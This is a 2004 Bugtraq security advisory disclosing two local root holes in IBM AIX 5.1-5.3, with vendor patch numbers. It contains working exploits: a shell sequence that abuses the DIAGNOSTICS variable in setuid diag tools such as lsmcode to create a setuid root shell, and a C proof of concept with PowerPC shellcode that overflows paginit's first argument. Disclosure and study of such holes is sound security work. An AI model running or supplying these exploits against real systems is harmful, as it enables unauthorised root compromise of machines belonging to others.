Date: Mon, 20 Dec 2004 12:10:41 +0100
From: cees-bart <ceesb@...ru.nl>
To: bugtraq@...urityfocus.com
Subject: AIX 5.1/5.2/5.3 local root exploits

hi,

i found some local security holes in IBM's AIX versions 5.1, 5.2 and 5.3
(unix for IBM RS/6000 powerpc).

1) the first is a bug in all setuid diag-related tools that use an
   environment variable as a prefix to an external binary executed as root.
2) the second is a classical stack overflow in a tool called paginit.

status: vendor contacted, patches are available:

1) for the diag bug, bugfix numbers are IY64389 (5.1), IY64523 (5.2) and
   IY64277 (5.3).
2) for the paginit bug, bugfix numbers are IY64358 (5.1), IY64522 (5.2) and
   IY64312 (5.3).

bug descriptions below.

regards,
cees-bart
phd student @ university of nijmegen

---

bug 1:

there are (at least) 4 broken suid binaries.

-r-sr-xr-x   1 root     system        10014 Sep 16 2002  /usr/sbin/lsmcode
-r-sr-x---   1 root     system         2796 Jan 26 2003  /usr/sbin/diag_exec
-r-sr-xr-x   1 root     system       450433 Apr 08 2004  /usr/sbin/invscout
-r-sr-xr-x   1 root     system       511362 Apr 08 2004  /usr/sbin/invscoutd

all these binaries are exploited the same way: the path set in the
$DIAGNOSTICS environment variable is used by these binaries to execute
$DIAGNOSTICS/bin/Dctrl as root (duh).

for example, executing the following gives a root shell:

mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh

bug 2:

the following setuid binary:

-r-sr-xr-x   1 root     security       7354 Mar 12 2003  /usr/bin/paginit

does not do a bounds check on the first command-line argument, which is
supposed to be a username. if you feed paginit the proper data and hit
enter, root privileges are gained.

POC exploit code:

/*
 * exploit for /usr/bin/paginit
 * tested on: AIX 5.2
 *
 * if the exploit fails it's because the shellcode ends up at a different
 * address. use dbx to check, and change RETADDR accordingly.
 *
 * cees-bart <ceesb@...ru.nl>
 */

#include <string.h>
#include <unistd.h>

#define RETADDR 0x2ff22c90

/* PowerPC execve("/bin/sh") shellcode. The first instruction,
 * xor. r5,r5,r5, also serves as the landing-zone filler below; the
 * following bnel is not taken (r5 == 0) but still loads lr, so mflr r5
 * yields the shellcode's own address. */
char shellcode[] =
  "\x7c\xa5\x2a\x79"    /* xor.  r5,r5,r5 */
  "\x40\x82\xff\xfd"    /* bnel  -4       */
  "\x7c\xa8\x02\xa6"    /* mflr  r5       */
  "\x38\xe0\x11\x11"
  "\x39\x20\x48\x11"
  "\x7c\xc7\x48\x10"
  "\x38\x46\xc9\x05"
  "\x39\x25\x11\x11"
  "\x38\x69\xef\x17"
  "\x38\x87\xee\xef"
  "\x7c\xc9\x03\xa6"
  "\x4e\x80\x04\x20"
  "\x2f\x62\x69\x6e"    /* "/bin"  */
  "\x2f\x73\x68\x00"    /* "/sh\0" */
;

char envlabel[] = "X=";

/* store x at buf in big-endian (PowerPC) byte order */
void printint(char *buf, int x)
{
  buf[0] = x >> 24;
  buf[1] = (x >> 16) & 0xff;
  buf[2] = (x >> 8) & 0xff;
  buf[3] = x & 0xff;
}

int main(int argc, char **argv)
{
  char *env[3];
  char code[1000];   /* environment string: "X=" + landing zone + shellcode */
  char buf[8000];    /* oversized first argument that overflows paginit's buffer */
  char *p, *i;
  int offset1 = 0;

  offset1 = 0; // atoi(argv[1]);

  memset(code, 'C', sizeof(code));
  memcpy(code, envlabel, sizeof(envlabel) - 1);

  /* landing zone: repeat the shellcode's first instruction so that any
   * 4-byte-aligned address inside it falls through into the shellcode
   * (loop bound keeps the last 4-byte store inside code[]) */
  for (i = code + sizeof(envlabel) + offset1; i + 4 <= code + sizeof(code); i += 4)
    printint(i, 0x7ca52a79);

  memcpy(code + sizeof(code) - sizeof(shellcode), shellcode, sizeof(shellcode) - 1);
  code[sizeof(code) - 1] = 0;
  env[0] = code;
  env[1] = 0;

  memset(buf, 'A', sizeof(buf));
  buf[sizeof(buf) - 1] = 0;

  p = buf;
  p += 4114;
  printint(p, RETADDR);   /* try to hit the landing zone */
  p += 72;
  printint(p, RETADDR);   /* any readable address (apparently not overwritten) */

  execle("/usr/bin/paginit", "/usr/bin/paginit", buf, (char *)0, env);
  return 1;               /* only reached if the exec failed */
}